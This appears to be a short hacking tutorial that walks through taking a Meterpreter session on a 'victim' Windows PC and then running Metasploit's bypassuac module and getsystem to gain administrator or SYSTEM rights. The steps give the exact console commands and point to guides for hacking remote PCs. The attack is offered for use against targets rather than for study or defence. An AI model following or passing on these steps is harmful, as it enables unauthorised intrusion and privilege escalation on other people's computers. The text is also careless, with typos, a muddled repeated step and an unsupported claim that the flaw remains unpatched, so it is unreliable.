If the Administrator Privilege code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
When we use Administrator Privilege command on CMD it will return an error "access denied".
BypassUAC exploit that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.
To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC.
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 : Firtly get a meterpreter of victim PC
Hack Remote Windows PC using Script Web Delivery
OR
Hack Remote Windows PC using Script Web Delivery(MSF Venom)
Step 2 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
And type shell to enter into Victims command prompt.
Step 3 : For that we need to background the session, and manually try bypassuac exploit and load the session recently backgrounded and then exploit and execute getsystem to get admin privilege.
Step 4 : search bypassuac
Step 5 : use exploit/windows/local/bypassuac
Step 6 : set session 1[meterpreter session No]
Step 7 : run
Step 8 : you have sucessfully done bypass uac and We now have a full Meterpreter shell to the target.
Step 9 : Now the session has opened type shell to get system information.
Step 10 : Type help to more action.